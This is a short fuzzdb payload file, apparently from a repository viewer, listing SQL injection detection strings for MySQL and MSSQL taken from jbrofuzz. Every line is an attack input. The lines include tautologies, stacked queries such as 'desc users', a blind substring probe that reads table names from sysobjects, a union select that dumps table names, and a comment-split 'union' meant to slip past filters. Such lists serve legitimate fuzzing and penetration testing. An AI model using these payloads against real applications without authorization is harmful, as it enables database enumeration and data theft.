fuzzdb/attack-payloads/sql-injection/detect/MySQL_MSSQL.fuzz.txt
2010-08-04 14:21:40 +00:00

11 lines
380 B
Text

# Contains statements from jbrofuzz (13 April 2010)
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where